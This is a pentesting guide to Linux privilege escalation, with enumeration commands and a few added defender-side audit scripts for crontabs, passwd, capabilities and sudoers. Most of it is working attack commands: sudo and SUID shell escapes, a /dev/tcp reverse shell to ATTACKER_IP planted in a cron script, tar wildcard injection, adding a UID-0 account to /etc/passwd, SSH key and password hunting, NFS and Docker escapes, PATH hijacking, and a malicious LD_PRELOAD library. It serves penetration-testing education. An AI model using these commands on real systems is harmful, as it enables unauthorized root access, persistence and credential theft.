Linux Privilege Escalation: Complete Guide for Pentesters

Privilege escalation is a critical phase in penetration testing where you elevate your access from a low-privileged user to root. This guide covers the most common Linux privilege escalation techniques, enumeration methods, and tools.

Initial Enumeration

Before attempting privilege escalation, gather information about the system.

System Information

# OS and kernel version
uname -a
cat /etc/os-release
cat /etc/issue
lsb_release -a

# Kernel version (important for kernel exploits)
uname -r

# Architecture
uname -m
arch

# Hostname
hostname

User Information

# Current user
whoami
id

# All users, then only those with a usable login shell
cat /etc/passwd
grep -v -e nologin -e false /etc/passwd

# User groups
groups
cat /etc/group

# Logged in users
w
who
last

# Sudo privileges
sudo -l

Network Information

# Network interfaces
ip a
ifconfig

# Routing table
ip route
route -n

# Open ports
ss -tulpn
netstat -tulpn

# Established connections
ss -tp
netstat -tp

# ARP table
arp -a
ip neigh

Automated Enumeration Tools

LinPEAS

# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or transfer and run
wget http://attacker.com/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinEnum

wget http://attacker.com/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -t

Linux Smart Enumeration (LSE)

curl -L https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh | bash

Sudo Exploitation

Check Sudo Permissions

sudo -l

Common Sudo Exploits

If you can run specific commands as root, check GTFOBins for exploitation methods:

# vim
sudo vim -c ':!/bin/bash'

# less
sudo less /etc/passwd
!/bin/bash

# find
sudo find /tmp -exec /bin/bash \;

# awk
sudo awk 'BEGIN {system("/bin/bash")}'

# python
sudo python -c 'import os; os.system("/bin/bash")'

# perl
sudo perl -e 'exec "/bin/bash";'

# ruby
sudo ruby -e 'exec "/bin/bash"'

# nmap (old versions)
sudo nmap --interactive
!sh

# tar
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

# zip
sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

# env
sudo env /bin/bash

Sudo Version Exploits

# Check sudo version
sudo --version

# CVE-2021-3156 (Baron Samedit) - Sudo 1.8.2 to 1.8.31p2, 1.9.0 to 1.9.5p1
# CVE-2019-14287 - Sudo < 1.8.28 (run as user ID -1)

SUID/SGID Binaries

Finding SUID/SGID Files

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null

# Find both
find / -perm /6000 -type f 2>/dev/null

Exploiting SUID Binaries

Check GTFOBins for SUID exploitation. Common examples:

# bash SUID
/bin/bash -p

# find SUID
find . -exec /bin/sh -p \; -quit

# vim SUID
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

# python SUID
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# cp SUID (copy /etc/passwd, modify, copy back)
# nmap SUID (older versions with --interactive)

Cron Jobs

Finding Cron Jobs

# System cron
cat /etc/crontab
ls -la /etc/cron.*

# User cron
crontab -l
ls -la /var/spool/cron/crontabs/

# Check for running cron processes
ps aux | grep cron

# Monitor for cron execution
# Use pspy to monitor processes without root

Exploiting Cron Jobs

# If a cron job runs a writable script
echo '/bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /path/to/script.sh

# If cron uses wildcard with tar
# Create malicious files in the directory
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"

# If cron runs a script that sources a writable file
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /writable/file
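A defender-side counterpart to the cron scenarios above, added here as an example and not part of the original guide: an audit that reads system-crontab text and flags root jobs that run tar on an unquoted wildcard or execute anything from a user-writable tree. The crontab content is constructed, and the list of untrusted directories (/tmp, /var/tmp, /dev/shm, /home) is an assumption about where unprivileged users can write.

```sh
#!/bin/sh
# Constructed /etc/crontab sample (system format: m h dom mon dow user command).
# The last two entries mirror the tar-wildcard and /tmp-script cases above.
SAMPLE_CRONTAB='SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /usr/local/bin/backup.sh
0 2     * * *   root    cd /home/user/site && tar czf /var/backups/site.tgz *
@reboot         root    sh /tmp/cleanup.sh'

# Read crontab text on $1; print one finding per line: <kind> <schedule> <user> <command>.
audit_crontab() {
    printf '%s\n' "$1" | awk '
        NF == 0 || $1 ~ /^#/                { next }   # blank lines and comments
        $1 ~ /^[A-Za-z_][A-Za-z0-9_]*=/     { next }   # SHELL=, PATH=, MAILTO= assignments
        {
            if ($1 ~ /^@/) { sched = $1; user = $2; first = 3 }   # @reboot, @daily, ...
            else { sched = $1 " " $2 " " $3 " " $4 " " $5; user = $6; first = 7 }
            if (user != "root") next          # only root jobs give root when hijacked
            cmd = ""
            for (i = first; i <= NF; i++) {
                if (i > first) cmd = cmd " "
                cmd = cmd $i
            }
            # tar fed an unquoted glob: a file named --checkpoint-action=... becomes an option
            if (cmd ~ /(^|[;&|[:space:]])tar[^;&|]*[[:space:]]\*/)
                print "TAR_WILDCARD", sched, user, cmd
            # the job executes something from a tree unprivileged users can write to
            if (cmd ~ /(^|[[:space:]])(\/tmp|\/var\/tmp|\/dev\/shm|\/home)\//)
                print "UNTRUSTED_PATH", sched, user, cmd
        }'
}

audit_crontab "$SAMPLE_CRONTAB"
```

On a live host, feed it `cat /etc/crontab /etc/cron.d/*` and then check the ownership and mode of every script the remaining root jobs reference.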

Writable Files and Directories

Finding Writable Locations

# World-writable files
find / -writable -type f 2>/dev/null

# World-writable directories
find / -writable -type d 2>/dev/null

# Files owned by current user
find / -user $(whoami) -type f 2>/dev/null

# Writable /etc/passwd
ls -la /etc/passwd

Exploiting Writable /etc/passwd

# Generate password hash
openssl passwd -1 -salt xyz password123

# Add new root user
echo 'newroot:$1$xyz$Abc123...:0:0:root:/root:/bin/bash' >> /etc/passwd

# Or replace root password hash
# Copy /etc/passwd, modify, replace
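The detection side of the technique just described, added here as an example (not from the original guide): a passwd audit that reports extra UID-0 accounts, password hashes placed inline instead of the "x" that defers to /etc/shadow, empty password fields and duplicate user names. The passwd content is constructed and the hash values are labelled placeholders.

```sh
#!/bin/sh
# Constructed /etc/passwd sample. newroot is the planted UID-0 account from the
# technique above; www-data carries a hash in the password field instead of the
# "x" that defers to /etc/shadow. Hash values are placeholders, not real hashes.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
newroot:$1$xyz$PLACEHOLDER_MD5CRYPT:0:0:root:/root:/bin/bash
www-data:$6$salt$PLACEHOLDER_SHA512CRYPT:33:33:www-data:/var/www:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash'

# Read passwd text on $1; print one finding per line: <kind> <user or raw line>.
# A healthy file yields no output; /etc/passwd itself should be root:root mode 644.
audit_passwd() {
    printf '%s\n' "$1" | awk -F: '
        NF != 7                 { print "MALFORMED", $0; next }   # not name:pw:uid:gid:gecos:home:shell
        $3 !~ /^[0-9]+$/        { print "BAD_UID", $1; next }
        $3 == 0 && $1 != "root" { print "EXTRA_UID0", $1 }        # second root-equivalent login
        $2 == ""                { print "EMPTY_PASSWORD", $1 }    # login with no password at all
        $2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ { print "INLINE_HASH", $1 }
        { seen[$1]++ }
        END { for (u in seen) if (seen[u] > 1) print "DUPLICATE_USER", u }'
}

audit_passwd "$SAMPLE_PASSWD"
```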

Capabilities

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Common exploitable capabilities
# cap_setuid - allows changing UID
# Example with python
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# cap_net_raw - allows raw sockets
# cap_dac_override - bypass file read/write permissions
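To turn the getcap listing into something reviewable, here is an added example (not part of the original guide) that parses getcap output in both formats libcap has printed over the years and grades each capability. The sample output is constructed; the HIGH list extends the page's cap_setuid and cap_dac_override with other well-known root-equivalent capabilities and is my own choice.

```sh
#!/bin/sh
# Constructed "getcap -r /" output mixing the two formats libcap has used:
# "<path> = <caps>" (libcap before 2.41) and "<path> <caps>" (libcap 2.41 and later).
GETCAP_OUTPUT='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/tar cap_dac_override=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/dumpcap cap_net_admin,cap_net_raw=eip'

# Read getcap output on $1; print one line per capability: <level> <path> <cap>.
# HIGH = a capability that by itself yields root-equivalent access (list is an
# assumption extending the two named on the page); everything else is INFO.
audit_getcap() {
    printf '%s\n' "$1" | awk '
        BEGIN { HIGH = "^cap_(setuid|setgid|dac_override|dac_read_search|sys_admin|sys_ptrace|sys_module|chown|fowner)$" }
        NF == 0 { next }
        {
            path = $1
            first = ($2 == "=") ? 3 : 2         # skip the "=" token of the old format
            for (f = first; f <= NF; f++) {      # each clause: cap_a,cap_b+ep or cap_a=ep
                clause = $f
                sub(/[+=].*/, "", clause)        # drop the flag set (e/p/i), keep the names
                n = split(clause, names, ",")
                for (i = 1; i <= n; i++) {
                    level = (names[i] ~ HIGH) ? "HIGH" : "INFO"
                    print level, path, names[i]
                }
            }
        }'
}

audit_getcap "$GETCAP_OUTPUT"
```

Any HIGH hit on an interpreter (python, perl, ruby) or an archiver deserves the same scrutiny as a SUID copy of that binary.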

Kernel Exploits

Finding Kernel Version

uname -r
cat /proc/version

Common Kernel Exploits

# Dirty COW (CVE-2016-5195) - Linux kernel < 4.8.3
# Dirty Pipe (CVE-2022-0847) - Linux kernel 5.8+

# Use searchsploit to find exploits
searchsploit linux kernel 4.4 privilege escalation

# Linux Exploit Suggester
./linux-exploit-suggester.sh

Password Hunting

# Search for passwords in files
grep -r "password" /home 2>/dev/null
grep -r "passwd" /home 2>/dev/null
grep -ri "pass" /etc 2>/dev/null

# History files
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.nano_history

# Config files
find / -name "*.conf" -type f 2>/dev/null | xargs grep -l "password" 2>/dev/null
find / -name "*.config" -type f 2>/dev/null
find / -name "*.ini" -type f 2>/dev/null

# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
cat ~/.ssh/id_rsa

# Web config files
cat /var/www/html/wp-config.php
cat /var/www/html/config.php

NFS Exploitation

# Check for NFS shares
cat /etc/exports
showmount -e target_ip

# If no_root_squash is set, mount and create SUID binary
# On attacker machine:
mkdir /tmp/nfs
mount -t nfs target_ip:/share /tmp/nfs
cp /bin/bash /tmp/nfs/
chmod +s /tmp/nfs/bash

# On target:
/share/bash -p

Docker Escape

# Check if in Docker
grep docker /proc/1/cgroup
ls -la /.dockerenv

# If user is in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Docker socket exposed
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh

PATH Hijacking

# If a SUID binary calls another binary without full path
# Check with strings
strings /usr/local/bin/suid-binary | grep -i "system\|exec\|popen"

# Create malicious binary in writable PATH location
echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/suid-binary

LD_PRELOAD Exploitation

# If sudo -l shows env_keep+=LD_PRELOAD
# Create malicious shared library

# shell.c
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Runs as the library's constructor (no crt startup files, hence -nostartfiles).
   Clearing LD_PRELOAD first keeps the spawned shell from loading this library again. */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}

# Compile
gcc -fPIC -shared -nostartfiles -o /tmp/shell.so shell.c

# Execute
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/allowed_binary
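The sudoers settings that make this and the Sudo Exploitation section above possible are easy to audit; this added example (not from the original guide) checks sudoers text for env_keep entries that preserve LD_PRELOAD or LD_LIBRARY_PATH, a disabled env_reset, and the setenv default or SETENV tag that lets a user inject arbitrary variables, shown against a weak and a hardened fragment. Both fragments and the user/binary names in them are constructed.

```sh
#!/bin/sh
# Constructed sudoers fragments (assumed, not from any real host). The weak one keeps
# LD_PRELOAD across sudo and lets alice set any variable (SETENV); the hardened one
# removes the LD_* variables and relies on env_reset plus a fixed secure_path.
WEAK_SUDOERS='Defaults env_reset
Defaults env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
Defaults !env_reset
alice ALL=(root) NOPASSWD: SETENV: /usr/bin/allowed_binary'

HARDENED_SUDOERS='Defaults env_reset
Defaults env_keep -= "LD_PRELOAD LD_LIBRARY_PATH"
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
alice ALL=(root) /usr/bin/allowed_binary'

# Read sudoers text on $1; print one finding per line: <kind> <offending line>.
audit_sudoers() {
    printf '%s\n' "$1" | awk '
        { sub(/[[:space:]]*#.*/, "") }      # drop comments (this also drops #include lines)
        NF == 0 { next }
        /^[[:space:]]*Defaults/ {
            # env_keep = or += naming an LD_* variable ("-=" is the fix and is not flagged)
            if ($0 ~ /env_keep[[:space:]]*\+?=.*(LD_PRELOAD|LD_LIBRARY_PATH)/) print "ENV_KEEP_LD", $0
            if ($0 ~ /!env_reset/)                         print "ENV_RESET_OFF", $0
            if ($0 ~ /[[:space:],]setenv([[:space:],]|$)/) print "SETENV_DEFAULT", $0
            next
        }
        /SETENV:/ { print "SETENV_TAG", $0 }   # per-rule tag: the user may set any variable
    '
}

echo "weak:";     audit_sudoers "$WEAK_SUDOERS"
echo "hardened:"; audit_sudoers "$HARDENED_SUDOERS"
```

Run it over `/etc/sudoers` and every file in `/etc/sudoers.d/` (as root, via visudo -c or cat); an empty result for a fragment means none of these four patterns is present.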

Summary

Linux privilege escalation requires systematic enumeration and understanding of common misconfigurations. Always run automated tools like LinPEAS, but also perform manual checks. Document your findings and chain multiple weaknesses when single vulnerabilities are not directly exploitable.

Written by Window Events
